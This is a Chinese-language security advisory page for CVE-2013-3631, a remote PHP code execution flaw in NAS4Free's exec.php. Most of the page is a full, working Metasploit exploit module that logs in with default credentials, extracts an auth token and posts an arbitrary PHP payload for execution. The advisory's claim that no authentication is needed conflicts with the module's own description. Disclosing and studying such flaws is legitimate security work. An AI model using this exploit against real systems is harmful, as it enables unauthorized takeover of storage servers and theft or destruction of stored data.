NAS4Free任意远程代码执行漏洞

CVE-ID:CVE-2013-3631

发布日期：2013-10-31

更新日期：2013-11-27

受影响系统：

NAS4Free NAS4Free <= 9.1.0.1.804

详细信息：

NAS4Free是嵌入式开源存储NAS，基于FreeBSD。 NAS4Free 9.1.0.1.804及之前版本没有有效过滤exec.php的请求，在实现上存在安全漏洞，成功利用后可使未经身份验证的远程攻击者执行任意PHP代码。

来源：

Brandon Perry

参考信息：

http://www.exploit-db.com/exploits/29320/

测试方法：

警告以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require \'msf/core\' require \'rex\' require \'rexml/document\' class Metasploit4 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, \'Name\' => \'NAS4Free Arbitrary Remote Code Execution\', \'Description\' => %q{ NAS4Free allows an authenticated user to post PHP code to a special HTTP script and have the code executed remotely. This module was successfully tested against NAS4Free version 9.1.0.1.804. Earlier builds are likely to be vulnerable as well. }, \'Author\' => [ \'Brandon Perry <bperry.volatile[at]gmail.com>\' # Discovery / msf module ], \'License\' => MSF_LICENSE, \'References\' => [ [\'CVE\', \'2013-3631\'], [\'URL\', \'https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats\'] ], \'Payload\' => { \'Space\' => 21244, \'DisableNops\' => true, \'BadChars\' => \'\' }, \'Targets\' => [ [ \'Automatic Target\', { } ] ], \'Privileged\' => true, \'Platform\' => [\'php\'], \'Arch\' => ARCH_PHP, \'DisclosureDate\' => \'Oct 30 2013\', \'DefaultTarget\' => 0)) register_options([ OptString.new(\'USERNAME\', [ true, "Username to authenticate with", "admin"]), OptString.new(\'PASSWORD\', [ false, "Password to authenticate with", "nas4free"]) ], self.class) end def exploit init = send_request_cgi({ \'method\' => \'GET\', \'uri\' => normalize_uri(target_uri.path, \'/\') }) sess = init.get_cookies post = { \'username\' => datastore["USERNAME"], \'password\' => datastore["PASSWORD"] } login = send_request_cgi({ \'method\' => \'POST\', \'uri\' => normalize_uri(target_uri.path, \'/login.php\'), \'vars_post\' => post, \'cookie\' => sess }) if !login or login.code != 302 fail_with("Login failed") end exec_resp = send_request_cgi({ \'method\' => \'GET\', \'uri\' => normalize_uri(target_uri.path, \'/exec.php\'), \'cookie\' => sess }) if !exec_resp or exec_resp.code != 200 fail_with(\'Error getting auth token from exec.php\') end authtoken = \'\' #The html returned is not well formed, so I can\'t parse it with rexml exec_resp.body.each_line do |line| next if line !~ /authtoken/ authtoken = line end doc = REXML::Document.new authtoken input = doc.root if !input fail_with(\'Error getting auth token\') end token = input.attributes["value"] data = Rex::MIME::Message.new data.add_part(\'\', nil, nil, \'form-data; name="txtCommand"\') data.add_part(\'\', nil, nil, \'form-data; name="txtRecallBuffer"\') data.add_part(\'\', nil, nil, \'form-data; name="dlPath"\') data.add_part(\'\', \'application/octet-stream\', nil, \'form-data; name="ulfile"; filename=""\') data.add_part(payload.encoded, nil, nil, \'form-data; name="txtPHPCommand"\') #data.add_part(token, nil, nil, \'form-data; name="authtoken"\') #I need to build the last data part by hand due to a bug in rex data_post = data.to_s data_post = data_post[0..data_post.length-data.bound.length-7] data_post << "\\r\\n--#{data.bound}" data_post << "\\r\\nContent-Disposition: form-data; name=\\"authtoken\\"\\r\\n\\r\\n" data_post << token data_post << "\\r\\n--#{data.bound}--\\r\\n\\r\\n" resp = send_request_raw({ \'method\' => \'POST\', \'uri\' => normalize_uri(target_uri.path, \'/exec.php\'), \'ctype\' => "multipart/form-data; boundary=#{data.bound}", \'data\' => data_post, \'cookie\' => sess }) end end

解决办法：

厂商补丁：

NAS4Free

--------

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://sourceforge.net/projects/nas4free/

参考：

http://www.kb.cert.org/vuls/id/326830

https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats